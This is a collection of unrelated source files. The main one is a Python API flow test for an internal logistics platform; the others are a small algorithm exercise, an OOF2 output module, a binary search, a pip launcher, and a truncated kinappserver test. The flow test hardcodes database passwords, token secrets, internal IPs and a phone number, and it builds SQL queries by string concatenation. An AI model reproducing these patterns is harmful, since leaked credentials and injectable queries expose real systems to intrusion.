c004b10f7c871892c40eca497663bdcacee8d764 | e7ee7f949ddd7791950dbda9f97bbf4d1d5ccd83 | /autoTest/fahuobaoSaaSFlowTest/SaaSFlowTest/FlowTestCase/FHBtoushuNormalFlow.py | 6b8c96109d98c6fc3ef7874303652d9e5a3ab9bb | [] | no_license | liangyi0310/autoTset | 2fd5ece9ecc3830f2841ddb5dac43cdc41d6efa6 | 8c657337fd046b71d3aa58b3bfbbea9845ff4d8a | refs/heads/master | 2023-05-24T11:03:00.807415 | 2021-06-09T08:36:33 | 2021-06-09T08:36:33 | 375,260,037 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,201 | py | # -*- coding: utf-8 -*-
import requests
import pymysql
import json
import datetime
import time
from Common.newReadConfig import *
# 发货宝web端操作用户18883612485
headers1 = {
'Content-Type' : 'application/json',
'tokenCode' : 'QM',
'tokenSecret' : '123456',
'systemCode':'FAHUOBAO'
}
# app端操作用户,平台师傅秦敏18599937985
headers2 = {
'Content-Type' : 'application/json',
'tokenCode' : 'XRLY2',
'tokenSecret' : '123456',
'systemCode':'SCM',
}
# 运营后台web端操作用户,scm用户18883612485
headers3 = {
'Content-Type' : 'application/json',
'tokenCode' : 'YYHTQM',
'tokenSecret' : '123456',
'systemCode':'SCM',
}
# 微信小程序用户,无需token
headers4 = {
'Content-Type' : 'application/json',
}
# 需要测试的环境
api_host = "192.168.10.56:8763"
# headers1={'Content-Type' : 'application/json',
# "token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyLXR5cGUiOm51bGwsInVzZXItbmFtZSI6Iua1i-ivlei0puiuoeWIkiIsInVzZXItcGFyYW0iOiJ7XCJ1c2VyUGhvbmVcIjpcIjE4ODgzNjEyNDg1XCIsXCJpc0FkbWluXCI6MX0iLCJ1c2VyLXN1YmplY3Rpb24iOiI1YTJhMjEwNC0wZjcwLTQ0YjctOWEwZS1jOTU2N2M1ZDFkYjAiLCJ1c2VyLWlkIjoiNWEyYTIxMDQtMGY3MC00NGI3LTlhMGUtYzk1NjdjNWQxZGIwIiwiaXNzIjoiMTg4ODM2MTI0ODUiLCJ1c2VyLWNvZGUiOiIxODg4MzYxMjQ4NSIsImV4cCI6MTUzNjIzMzA1OCwiaWF0IjoxNTM2MjE4NjU4fQ.nvK3rWY7O-aoObltDEqjGuN50h9V6wxdwGZMBFsqvHQ"
# }
#
# headers2={'Content-Type' : 'application/json',
# "token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyLXR5cGUiOiJEWExYMDUiLCJ1c2VyLW5hbWUiOiLmooHmr4UiLCJ1c2VyLXBhcmFtIjoie1widXNlclBob25lXCI6XCIxNTAyMzYyMTcwMlwiLFwiaXNBZG1pblwiOjEsXCJoZWFkUGhvdG9cIjpcIjViN2ZhNWZkNWIxZmFjMDAwMTNiNTYyMVwifSIsInVzZXItc3ViamVjdGlvbiI6IjMzYjkyZThjLTZkMzgtNGI4MS05NGRlLTRlOGNjNjU2ODcxOCIsInVzZXItaWQiOiIzM2I5MmU4Yy02ZDM4LTRiODEtOTRkZS00ZThjYzY1Njg3MTgiLCJpc3MiOiJVSUQ1MDM4MDA1MDM4IiwidXNlci1jb2RlIjoiVUlENTAzODAwNTAzOCIsImV4cCI6MTUzODgwODg0OSwiaWF0IjoxNTM2MjE2ODQ5fQ.Zc4L0mv-eR--cYakGfPIYF6RGGFnNyNq9HlCI_NskKs"
# }
#图片id
Pictureid = '5b4ef81bd423d40001f0195e'
# 录单使用的产品信息
goods = [
{
"num":1,
"picture":Pictureid,
"memo":"",
"bigClassNo":"FHB02",
"middleClassNo":"FHB02008",
"pictureType":2,
"pictureName":"2018012214"
}
]
for a in range(10):
def addorder():
#发货宝录单接口
url1 = "http://" + api_host + "/ms-fahuobao-order/FhbOrder/saveOrder"
i = datetime.datetime.now()
print("收件人姓名:商家投诉流程测试" + str(i.month) + str(i.day)+'-'+str(i.hour)+':'+str(i.minute))
data1 = {
"businessNo": "BSTE02",
"serviceNo": "FHB01",
"orderWay": "1",
"wokerUserName": "",
"wokerPhone": "",
"wokerPrice": "",
"checked": "",
"verfiyType": "",
"goods": goods,
"isElevator": "",
"predictServiceDate": "",
"predictDevliveryDate": "",
"memo": "",
"isArriva": 1,
"boolCollection": "0",
"collectionMoney": "",
"collectionMemo": "",
"allVolume": "1",
"allWeight": "1",
"allPackages": "1",
"consigneeName": "商家投诉流程测试"+ str(i.month) + str(i.day)+'-'+str(i.hour)+':'+str(i.minute),
"consigneePhone": "18883612485",
"consigneeAddress": "231",
"deliveryName": "23213",
"deliveryPhone": "18883612485",
"provinceNo": "430000",
"province": "湖南省",
"cityNo": "430100",
"city": "长沙市",
"districtNo": "430103",
"district": "天心区",
"deliveryProvinceNo": "",
"deliveryProvince": "",
"deliveryCityNo": "",
"deliveryCity": "",
"deliveryDistrictNo": "",
"deliveryDistrict": "",
"verifyOrderNo": ""
}
request1 = requests.request("POST", url=url1, data = json.dumps(data1) ,headers = headers1)
print("录单:" + request1.text)
def connectdb():
# 打开数据库连接
db = pymysql.connect(host='192.168.10.59', port=3307, user='fahuobao', password='jjt.123', db='fahuobao',
charset='utf8', cursorclass=pymysql.cursors.DictCursor)
db2 = pymysql.connect(host='192.168.10.70', port=3306, user='mydbz', password='qazwsx..', db='athena',
charset='utf8', cursorclass=pymysql.cursors.DictCursor)
return db,db2
def tousuflow(db,db2):
i = datetime.datetime.now()
consigne_name1 = "商家投诉流程测试" + str(i.month) + str(i.day)+'-'+str(i.hour)+':'+str(i.minute)
# 通过订单的收件人姓名查询出订单id
db.connect()
time.sleep(2)
sql1 = "SELECT fhb_order_id,order_no,service_code FROM fhb_order_consignee_info a inner join fhb_order b on a.fhb_order_id=b.id WHERE a.consigne_name = '"+consigne_name1+"' ORDER BY a.foundtime DESC"
try:
# 使用cursor()方法获取操作游标
cursor = db.cursor()
# 执行SQL语句
cursor.execute(sql1)
# 获取所有记录列表
results = cursor.fetchall()
# print(results[0])
# 有多个的情况,取第一个订单的id
orderid = results[0]['fhb_order_id']
orderno=results[0]['order_no']
# service_code=results[0]['service_code']
print("订单id:" + orderid)
print("订单编号:" + orderno)
# print("服务码:" + service_code)
db.close()
# 将订单推到天心区并用185这个账号进行竞价
url2 = "http://" + api_host + "/ms-fahuobao-order/bidding/quoted-price"
data2 = {
"memo":"",
"money":"200",
"orderId":orderid
}
request2 = requests.request("POST", url=url2, data=json.dumps(data2), headers=headers2)
print("竞价:" + request2.text)
# 通过师傅id查询竞价记录
db.connect()
# sql2 = "SELECT id,fhb_order_id,people_user_id FROM fhb_order_bidding_log WHERE people_user_id ='0cacc658-dd29-40bb-9c69-b2e19677275f' and fhb_order_id= '"+orderid+"' ORDER BY foundtime DESC"
sql2="SELECT id,fhb_order_id,people_user_id FROM fhb_order_bidding_log WHERE fhb_order_id= '"+orderid+"' ORDER BY foundtime DESC"
print(sql2)
# 使用cursor()方法获取操作游标
cursor2 = db.cursor()
# 执行SQL语句
cursor2.execute(sql2)
# 获取所有记录列表
results2 = cursor2.fetchall()
# print(results[0])
# 有多个的情况,取第一个订单的id
fhb_order_id=orderid
jingjiaid = results2[0]['id']
jingjiashifuid=results2[0]['people_user_id']
print("订单id:" + fhb_order_id)
print("竞价id:" + jingjiaid)
print("竞价师傅id:" + jingjiashifuid)
# db.close()
# 修改竞价金额为0.01
sql3 = "UPDATE fhb_order_bidding_log set money = '0.01' where fhb_order_id = '" + orderid + "'"
print(sql3)
cursor3 = db.cursor()
# 执行SQL语句
cursor3.execute(sql3)
#MySQL的默认存储引擎就是InnoDB, 所以对数据库数据的操作会在事先分配的缓存中进行, 只有在commit之后, 数据库的数据才会改变
db.commit()
# 选择接口
url3 = "http://" + api_host + "/ms-fahuobao-order/FhbOrder/choice-pay?t=1531964865851&orderId="+fhb_order_id+"&biddingLogId="+jingjiaid+""
request_yichang = requests.request("GET", url=url3, headers=headers1)
# tuikuan_data = json.loads(request_tuikuan.text)
# result3 = tuikuan_data['data']
# print(result3)
# data3 = result3[0]
# XZpeople=data3['people']
# print("选择师傅"+XZpeople)
# data3 = result1[0]
# request3 = requests.request("GET", url=url3, data=json.dumps(data3), headers=headers1)
# print("选择师傅:" + request3.text)
# 支付接口,objectList为订单id
url4 = "http://" + api_host + "/ms-user-wallet/wallet/balance-pay"
data4 = {"objectList":[fhb_order_id],"money":0.01,"password":"123456"}
request4 = requests.request("POST", url=url4, data=json.dumps(data4), headers=headers1)
print("支付:" + request4.text)
# 通过发货宝订单编号查出scm订单id与订单编号
time.sleep(5)
db2.connect()
sql4 = "select id,order_no from order_data where order_no='"+orderno+"'"
# 使用cursor()方法获取操作游标
cursor4 = db2.cursor()
# 执行SQL语句
cursor4.execute(sql4)
# 获取所有记录列表
results4 = cursor4.fetchall()
# print(results[0])
# 有多个的情况,取第一个订单的id
scmorderid = results4[0]['id']
scmorderno=results[0]['order_no']
print("scm订单id:" + scmorderid)
print("scm订单编号:" + scmorderno)
# db2.close()
# 预约
url5 = "http://" + api_host + "/ms-fahuobao-order-data/appOrder/appointappoint-distributionOne-choose"
data5 = {
"branchUserId": "",
"cause": "",
"codeYT": "night",
"ids": [scmorderid],
"timeYT": str(i.year) + "-" + str(i.month) + "-" + str(i.day)
}
# print(json.dumps(data5))
request5 = requests.request("POST", url=url5, data=json.dumps(data5), headers=headers2)
print("预约:" + request5.text)
# 提货
db2.connect()
sql5 = "select id from assign_worker where order_id = '" + scmorderid + "'"
print(sql5)
cursor5 = db2.cursor()
cursor5.execute(sql5)
# 获取所有记录列表
results5 = cursor5.fetchall()
# print(results6[0])
assignid = results5[0]["id"]
print("assigned:"+assignid)
url6 = "http://" + api_host + "/ms-fahuobao-order-data/appOrder/pickGoods"
data6 = {"assignId":assignid,"imgId":["5b5810b5d423d400017bf0c2"],"serviceTypeCode":"CZSETE01"}
request6 = requests.request("POST", url=url6, data=json.dumps(data6), headers=headers2)
print("提货:" + request6.text)
time.sleep(3)
# 上门
url7 = "http://" + api_host + "/ms-fahuobao-order-data/appOrder/houseCall?assignId=" + assignid + "&orderId=" + assignid +"" #post请求拼接
request7 = requests.request("POST", url=url7, headers=headers2)
print("上门:" + request7.text)
# 签收
db.connect()
sql6 = "select service_code from fhb_order where order_no = '" + orderno + "'"
print(sql6)
cursor6 = db.cursor()
cursor6.execute(sql6)
# 获取所有记录列表
results6 = cursor6.fetchall()
# print(results6[0])
service_code = results6[0]["service_code"]
time.sleep(3)
print(service_code)
url8 = "http://" + api_host + "/ms-fahuobao-order-data/appOrder/appOrderSign"
data8 = {
"assignId": assignid,
"imgId": ["5b581a07d423d400017bf0d2"],
"jdVerificationCode": "",
"qmImg": "5b581a00d423d400017bf0d0",
"serviceCode": service_code,
"serviceTypeCode": "CZSETE01"
}
request8 = requests.request("POST", url=url8, data=json.dumps(data8), headers=headers2)
print("签收:" + request8.text)
# 客户发起投诉
print("师傅id:"+jingjiashifuid)
Pictureid='5b4ef81bd423d40001f0195e'
# 发货宝商家评价
# url9 = "http://" + api_host + "/ms-fahuobao-order/FhbOrder/evaluation"
# data9 = {"fhbOrderId":fhb_order_id,"stars":5,"pictures":"","memo":"","tips":""}
# print(json.dumps(data9))
# time.sleep(2)
# request9 = requests.request("POST", url=url9, data=json.dumps(data9),headers = headers1)
# print("发货宝商家评价:" + request9.text)
#
# # # 发货宝商家发起投诉
# # url10 = "http://" + api_host + "/ms-fahuobao-order/merchantComplain/complain"
# # data10 ={"complainCauseCode":"CAUSE1","complainMemo":"231","complainPicture":[Pictureid],"fhbOrderId":fhb_order_id}
# #
# # request9 = requests.request("POST", url=url10, data=json.dumps(data10),headers = headers1)
# # print("发货宝商家发起投诉:" + request6.text)
# #
# # # 投诉处理
# # time.sleep(5)
# # db.connect()
# # sql7 = "select id from fhb_complain_record where order_id='"+fhb_order_id+"' and worker_id='"+jingjiashifuid+"' order by foundtime desc"
# #
# # # 使用cursor()方法获取操作游标
# # cursor7 = db.cursor()
# # # 执行SQL语句
# # cursor7.execute(sql7)
# # # 获取所有记录列表
# # results7 = cursor7.fetchall()
# # # print(results[0])
# # # 有多个的情况,取第一个订单的id
# # tousuid = results7[0]['id']
# # print("投诉id:" + tousuid)
#
# # # 投诉处理
# # url11 = "http://" + api_host + "/ms-fahuobao-order/fhbComplain/complainRecordBean"
# # data11 = {"dealImg":[],"boolReal":1,"dealWithNo":"COMPLAINRESULT3","dealWithDeduct":"","dealWithMemo":"32231231","complainId":tousuid}
# # request11 = requests.request("POST", url=url11, data=json.dumps(data11), headers=headers3)
# # print("投诉处理:" + request7.text)
#
except:
print("Error: unable to fecth data")
def closedb(db,db2):
# 关闭数据库连接
db.close()
db2.close()
def main():
addorder()
db,db2 = connectdb()
tousuflow(db,db2)
closedb(db,db2)
if __name__ == '__main__':
main()
| [
"1060508831@qq.com"
] | 1060508831@qq.com |
b80c485d4c2cdda02cf51ddd54d15ea3e5671002 | a1dac2b2237b079f2aaae5ac395446128b0693fe | /main/lesson3/task3.py | a9188142f9831f238451c7d7958aa65c2715e248 | [] | no_license | Alexidis/algorithms_basics_py | be439d4f645f6342cf07a124d70183e7fcaff14e | 5c07952cdacd099cc67942aeeb69b3ca27d80ff2 | refs/heads/master | 2023-03-05T05:08:24.092582 | 2021-02-15T15:03:11 | 2021-02-15T15:03:11 | 331,846,757 | 0 | 0 | null | 2021-02-15T15:03:12 | 2021-01-22T05:32:58 | Python | UTF-8 | Python | false | false | 992 | py | # 3. В массиве случайных целых чисел поменять местами минимальный и максимальный элементы.
import random
def main():
lst = [random.randint(-20, 33) for _ in range(0, 10)]
print(lst)
local_max = {'idx': 0, 'value': lst[0]}
local_min = {'idx': 0, 'value': lst[0]}
for i, item in enumerate(lst):
if item > local_max['value']:
local_max['idx'] = i
local_max['value'] = item
if item < local_min['value']:
local_min['idx'] = i
local_min['value'] = item
lst[local_max['idx']] = local_min['value']
lst[local_min['idx']] = local_max['value']
print(f'Значение максимального элемента {local_max["value"]}, а его индекс {local_max["idx"]}')
print(f'Значение минимального элемента {local_min["value"]}, а его индекс {local_min["idx"]}')
print(lst)
| [
"Alexidis911@gmail.com"
] | Alexidis911@gmail.com |
ab4a4ec80a1bfd3b4a215a39861be605bc408651 | 9766c2e479e99cca5bf7cc834c949fc4d5286275 | /SRC/engine/IO/outputdestination.py | c01e8e8163a5f71c0b0c1fb0662dbb4b7e54d8e7 | [
"LicenseRef-scancode-warranty-disclaimer"
] | no_license | UstbCmsPjy/OOF2 | 4c141e8da3c7e3c5bc9129c2cb27ed301455a155 | f8539080529d257a02b8f5cc44040637387ed9a1 | refs/heads/master | 2023-05-05T09:58:22.597997 | 2020-05-28T23:05:30 | 2020-05-28T23:05:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,483 | py | # -*- python -*-
# This software was produced by NIST, an agency of the U.S. government,
# and by statute is not subject to copyright in the United States.
# Recipients of this software assume all responsibilities associated
# with its operation, modification and maintenance. However, to
# facilitate maintenance we ask that before distributing modified
# versions of this software, you first contact the authors at
# oof_manager@nist.gov.
from ooflib.SWIG.common import lock
from ooflib.SWIG.common import switchboard
from ooflib.common import debug
from ooflib.common import enum
from ooflib.common import registeredclass
from ooflib.common import utils
from ooflib.common.IO import datafile
from ooflib.common.IO import formatchars
from ooflib.common.IO import filenameparam
from ooflib.common.IO import parameter
from ooflib.common.IO import reporter
from ooflib.common.IO import xmlmenudump
import os
import weakref
class OutputDestination(registeredclass.RegisteredClass):
registry = []
tip="What to do with Scheduled Output data."
discussion=xmlmenudump.loadFile('DISCUSSIONS/engine/reg/outputdest.xml')
def open(self):
pass
# def open_append(self):
# pass
def flush(self):
pass
def rewind(self):
pass
def close(self):
pass
#=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=#
class GfxWindowDestination(OutputDestination):
def shortrepr(self):
return "<Graphics Window>"
registeredclass.Registration(
'Graphics Window',
OutputDestination,
GfxWindowDestination,
rewindable=False,
ordering=0,
tip="Send graphics window updates to the graphics window.",
discussion=xmlmenudump.loadFile('DISCUSSIONS/engine/reg/gfxoutputdest.xml')
)
#=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=#
# BaseOutputStream does the work for OutputStream, which writes Output
# data to a file. More than one OutputStream can write to the same
# file, which they do by sharing a single BaseOutputStream.
_allStreams = utils.OrderedDict() # All BaseOutputStreams, keyed by filename
_streamsLock = lock.SLock() # Controls access to _allStreams
class BaseOutputStream(object):
def __init__(self, filename, mode, openfile):
self.filename = filename
self.file = None
self.openfile = openfile # fn that actually opens the file
# _streamsLock has always been aquired before __init__ is called.
_allStreams[filename] = self
self.referents = [] # all OutputStreams using this BaseOutputStream
# lastOutput and lastargs are used to decide whether or not to
# write the header info in the data file. It's not written if
# the output and its args are the same as they were for the
# previous write.
self.lastOutput = None
self.lastargs = None
self.seplast = True # was the last thing written a separator?
self.nOpen = 0 # net number of times this has been opened
self.everOpened = False # has this been opened in this oof2 session?
self.lock = lock.SLock() # controls access by OutputStreams
self.mode = mode
self.rewound = False
self.appending = False
def addStream(self, stream):
self.lock.acquire()
self.referents.append(weakref.ref(stream, self._removeStream))
self.lock.release()
def _removeStream(self, wref):
self.referents.remove(wref)
self.lock.acquire()
try:
if len(self.referents) == 0 and self.file is not None:
self.file.close()
self.file = None
del _allStreams[self.filename]
finally:
self.lock.release()
switchboard.notify("output destinations changed")
def open(self):
self.lock.acquire()
try:
if self.file is None:
# The file should be opened with mode "w" if either of
# these conditions holds:
# * It hasn't been opened before during this
# session, and self.mode="w"
# * It's been rewound since the last time it was
# opened.
# In all other cases, it should be opened with mode "a".
if (not self.everOpened and self.mode == "w") or self.rewound:
mowed = "w"
self.rewound = False
self.lastOutput = None
self.seplast = True
self.appending = False
else:
mowed = "a"
self.appending = os.path.exists(self.filename)
self.file = self.openfile(self.filename, mowed)
self.everOpened = True
self.nOpen += 1
finally:
self.lock.release()
def rewind(self):
self.lock.acquire()
self.seplast = True
self.rewound = True
try:
if self.file is not None:
self.file.close()
self.file = None
self.mode = filenameparam.WriteMode("w")
self.everOpened = False
self.lastOutput = None
finally:
self.lock.release()
def close(self):
self.lock.acquire()
try:
self.nOpen -= 1
assert self.nOpen >= 0
if self.nOpen == 0:
self.file.close()
self.file = None
self.seplast = True
finally:
self.lock.release()
def flush(self):
self.lock.acquire()
try:
if self.file is not None:
self.file.flush()
finally:
self.lock.release()
def printHeadersIfNeeded(self, output, *args, **kwargs):
if self.lastOutput != output or self.lastargs != (args, kwargs):
if self.appending or self.lastOutput is not None:
self.file.write("\n") # insert extra blank line before header
output.printHeaders(self, *args, **kwargs)
self.lastOutput = output
self.lastargs = (args, kwargs)
def write(self, text):
# When an object with a "write" method is used as the argument
# of "print >>", write is called once for each printed string,
# once for each space between printed strings, and once for
# the newline at the end.
if text == " " and not self.seplast:
self.file.write(formatchars.getSeparator())
self.seplast = True
elif text == "\n":
self.file.write(text)
self.seplast = True
else:
self.file.write(text)
self.seplast = False
def comment(self, *args):
self.file.write(" ".join([formatchars.getCommentChar()] +
[x for x in args] ))
self.file.write("\n")
self.seplast = False
def rewindStream(filename):
stream = _allStreams[filename]
stream.rewind()
#=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=#
# TextOutputDestination is an intermediate baseclass for
# OutputDestinations that produce some sort of human readable text
# (ie, not OOF2 data files which might be ascii). This includes the
# results of Analysis operations. There are two subclasses:
# OutputStream, which writes to a file, and MessageWindowStream, which
# writes to the OOF2 Message Window.
class TextOutputDestination(OutputDestination):
def __init__(self, basestream):
# Multiple TextOutputDestinations can share the same
# basestream, which is a BaseOutputStream.
self.basestream = basestream
basestream.addStream(self)
def open(self):
self.basestream.open()
def rewind(self):
self.basestream.rewind()
def printHeadersIfNeeded(self, output, *args, **kwargs):
self.basestream.printHeadersIfNeeded(output, *args, **kwargs)
def write(self, text):
self.basestream.write(text)
def comment(self, *args):
self.basestream.comment(*args)
def close(self):
self.basestream.close()
# OutputStream directs output to a file, specified by a file name and
# mode. If two OutputStreams have the same filename but different
# modes, the *last* mode specified is used. TODO: Make sure that the
# documentation is correct about that. It used to be different.
class OutputStream(TextOutputDestination):
def __init__(self, filename, mode):
self.filename = filename
self.mode = mode
try:
_streamsLock.acquire()
try:
basestream = _allStreams[filename]
except KeyError:
basestream = BaseOutputStream(filename, mode, file)
else:
basestream.mode = mode
finally:
_streamsLock.release()
TextOutputDestination.__init__(self, basestream)
switchboard.notify("output destinations changed")
def shortrepr(self):
return self.filename
# newreg is referred to in outputdestinationwidget.py.
newreg = registeredclass.Registration(
'Output Stream',
OutputDestination,
OutputStream,
ordering=1,
rewindable=True,
params=[
filenameparam.WriteFileNameParameter(
'filename', tip=parameter.emptyTipString),
filenameparam.WriteModeParameter(
'mode', tip="Whether to write or append to the file.")
],
tip="Send output to a file.",
discussion=xmlmenudump.loadFile('DISCUSSIONS/engine/reg/outputstream.xml')
)
#=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=#
msgWindowName = "<Message Window>"
class MessageWindowStream(TextOutputDestination):
def __init__(self):
TextOutputDestination.__init__(
self,
BaseOutputStream(msgWindowName, filenameparam.WriteMode("w"),
lambda f,m: reporter.fileobj))
def shortrepr(self):
return "<Message Window>"
registeredclass.Registration(
'Message Window',
OutputDestination,
MessageWindowStream,
ordering=0,
rewindable=False,
tip="Send output to the Message Window.",
discussion=xmlmenudump.loadFile('DISCUSSIONS/engine/reg/messagewindow.xml')
)
msgWindowOutputDestination = MessageWindowStream()
#=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=#
def allTextOutputStreams():
_streamsLock.acquire()
try:
return [n for n in _allStreams.keys() if n != msgWindowName]
finally:
_streamsLock.release()
def forgetTextOutputStreams():
_streamsLock.acquire()
try:
_allStreams.clear()
finally:
_streamsLock.release()
switchboard.notify("output destinations changed")
def getLatestMode(filename, default):
try:
return _allStreams[filename].mode
except KeyError:
return default
#=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=#
class DataFileOutput(OutputDestination):
def __init__(self, filename, mode, format):
self.filename = filename
self.mode = mode
self.format = format
self._dfile = None
self.everOpened = False
self.rewound = False
def open(self):
## See BaseOutputStream.open()
assert self._dfile is None
if (not self.everOpened and self.mode == "w") or self.rewound:
mowed = "w"
self.rewound = False
else:
mowed = "a"
self._dfile = datafile.writeDataFile(
self.filename, mowed, self.format)
self.everOpened= True
def dfile(self):
assert self._dfile is not None
return self._dfile
def flush(self):
if self.isOpen():
self._dfile.flush()
def close(self):
if self.isOpen():
self._dfile.close()
self._dfile = None
def isOpen(self):
return self._dfile is not None
def rewind(self):
# TODO?: what if mode == 'append'? The next call to
# dfile() will reopen at the end of the file. Should it be
# illegal to rewind a file opened for appending?
self.close()
self._dfile = None
self.rewound = True
self.everOpened = False
def shortrepr(self):
return "%s (%s)" % (self.filename, self.format.string())
registeredclass.Registration(
'Data File',
OutputDestination,
DataFileOutput,
rewindable=True,
params=[
filenameparam.WriteFileNameParameter(
"filename", tip=parameter.emptyTipString),
filenameparam.WriteModeParameter(
"mode", tip="Whether to write or append to the file."),
enum.EnumParameter('format', datafile.DataFileFormat, datafile.ASCII,
tip="Format of the file.")
],
ordering=3,
tip="Send Mesh data to a file.",
discussion=xmlmenudump.loadFile('DISCUSSIONS/engine/reg/datafiledest.xml'))
#=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=#
class OutputDestinationParameter(parameter.RegisteredParameter):
def __init__(self, name, value=None, default=None, tip=None):
parameter.RegisteredParameter.__init__(
self, name=name, reg=OutputDestination,
value=value, default=default, tip=tip)
def clone(self):
return self.__class__(self.name, self.value, self.default, self.tip)
| [
"lnz5@rosie.nist.gov"
] | lnz5@rosie.nist.gov |
0ce985d697a05c53a33705123bd8fdc79fa2a290 | 1b7921f8df829aa9a767f3e8657bf5ff9cf6247a | /python/suanfa20-04-03/unit2_digui_bin_search.py | 23779e83ce4580d4cfc75cb0398915e0fcf8cbe5 | [] | no_license | yujianBai/python_base | 80bc71441c919d668ea56982ba19477333653874 | 63b72787b7b93f547941ffe8c3472eb9ce15bda6 | refs/heads/master | 2021-06-11T12:27:43.976068 | 2021-05-10T14:24:03 | 2021-05-10T14:24:03 | 154,644,020 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 823 | py | # auth Bernard
# date 2020-04-05
import random
# data = [1, 7, 17, 19, 21, 22, 35, 66, 77, 99, 101]
def produce_data(start, stop, length):
# 随机生成一个长度为length的list
data_list = []
for i in range(length):
data_list.append(random.randint(start, stop))
return data_list
def search2(left, right, data_list, target):
if left > right:
return -1
mid = (left + right) // 2
if target == data_list[mid]:
return mid
elif target > data_list[mid]:
return search2(mid + 1, right, data_list, target)
else:
return search2(left, mid - 1, data_list, target)
if __name__ == "__main__":
data = sorted(produce_data(1, 100, 10))
print(data)
print(search2(0, len(data) - 1, data, 17))
print(search2(0, len(data) - 1, data, 101))
| [
"244643099@qq.com"
] | 244643099@qq.com |
9c264e1993b80b7ae7a8f5855e308da0400fa976 | f4c7fd56caf93670a7e5ebf760d3cc9bdf2fe7c3 | /venv/Scripts/pip3-script.py | f6d2f20d41ac587a723fd0d58a20ae250bbd6bf2 | [] | no_license | HAP28/4Connect | 9ea7773a8b86497a272b42b782b9a6ce3286ab81 | d53c7bbd18b9d92fc0b2134919ab6041b77c9324 | refs/heads/master | 2022-06-01T22:48:57.349826 | 2020-05-06T10:46:30 | 2020-05-06T10:46:30 | 261,727,266 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 416 | py | #!C:\Users\Harshit\PycharmProjects\4Connect\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==10.0.1','console_scripts','pip3'
__requires__ = 'pip==10.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==10.0.1', 'console_scripts', 'pip3')()
)
| [
"harshitparikh2000@gmail.com"
] | harshitparikh2000@gmail.com |
91ceb21dae0b2909a51b7bc58276c4bbf5770be6 | 6a6ee7af2131d40709d307602cdab749900f7f28 | /days/day09/puzzle_09.py | c114c9e829b1d04d5b47a269ee03c75c85307b7e | [] | no_license | troyunverdruss/advent-of-code-2017 | 7a44c364b0e89bd4e1be3443268385b78d7c257f | e8dd1ce2867679adef2c6360ffe9eab2eddecaf0 | refs/heads/master | 2020-04-14T18:32:41.291075 | 2019-04-27T22:22:22 | 2019-04-27T22:22:22 | 164,023,065 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,116 | py | from collections import deque
from helpers import read_raw_entries
def solve_09(input_str, return_garbage_count=False):
capture = deque(list(input_str))
stack = deque()
total = 0
current_value = 0
garbage_count = 0
while len(capture) > 0:
char = capture.popleft()
if char == '{':
stack.append(char)
current_value += 1
elif char == '}':
stack.pop()
total += current_value
current_value -= 1
elif char == '<':
next_char = capture.popleft()
while next_char != '>':
if next_char == '!':
capture.popleft()
else:
garbage_count += 1
next_char = capture.popleft()
if return_garbage_count:
return garbage_count
return total
if __name__ == '__main__':
input_str = read_raw_entries('input_d9.txt')[0].strip()
r = solve_09(input_str)
print('part 1, total value: {}'.format(r))
r = solve_09(input_str, True)
print('part 2, garbage removed: {}'.format(r))
| [
"troy@unverdruss.net"
] | troy@unverdruss.net |
f457a3a931655e762980fc357d3d06aa909aa6ad | 40df7897ad7e9e37882129fbfc3fc331f71218d2 | /kinappserver/tests/task_results_overwrite.py | c202aba98d80ed68451cea0a63e39b279dd4012a | [] | no_license | kinecosystem/kin-app-server | f25158d9ff4c31d29ea4407376cc6534d6b95b04 | f74d01eb1d198da1629139a90a6acb6c7df15f1e | refs/heads/master | 2021-06-03T10:35:51.844299 | 2019-06-18T12:18:59 | 2019-06-18T12:18:59 | 118,350,901 | 11 | 3 | null | 2021-05-06T19:11:54 | 2018-01-21T16:14:06 | Python | UTF-8 | Python | false | false | 5,429 | py | from time import sleep
import unittest
import uuid
import simplejson as json
import testing.postgresql
import kinappserver
from kinappserver import db
import logging as log
log.getLogger().setLevel(log.INFO)
USER_ID_HEADER = "X-USERID"
class Tester(unittest.TestCase):
@classmethod
def setUpClass(cls):
pass
def setUp(self):
#overwrite the db name, dont interfere with stage db data
self.postgresql = testing.postgresql.Postgresql()
kinappserver.app.config['SQLALCHEMY_DATABASE_URI'] = self.postgresql.url()
kinappserver.app.testing = True
self.app = kinappserver.app.test_client()
db.drop_all()
db.create_all()
def tearDown(self):
self.postgresql.stop()
def test_task_results_overwrite(self):
"""test storting task results"""
for cat_id in range(2):
cat = {'id': str(cat_id),
'title': 'cat-title',
'supported_os': 'all',
"skip_image_test": True,
'ui_data': {'color': "#123",
'image_url': 'https://s3.amazonaws.com/kinapp-static/brand_img/gift_card.png',
'header_image_url': 'https://s3.amazonaws.com/kinapp-static/brand_img/gift_card.png'}}
resp = self.app.post('/category/add',
data=json.dumps({
'category': cat}),
headers={},
content_type='application/json')
self.assertEqual(resp.status_code, 200)
# add a task
task0 = {
'id': '0',
'cat_id': '0',
'position': 0,
'title': 'do you know horses?',
'desc': 'horses_4_dummies',
'type': 'questionnaire',
'price': 1,
'skip_image_test': True,
'min_to_complete': 2,
'tags': ['music', 'crypto', 'movies', 'kardashians', 'horses'],
'provider':
{'name': 'om-nom-nom-food', 'image_url': 'http://inter.webs/horsie.jpg'},
'items': [
{
'id': '435',
'text': 'what animal is this?',
'type': 'textimage',
'results': [
{'id': '235',
'text': 'a horse!',
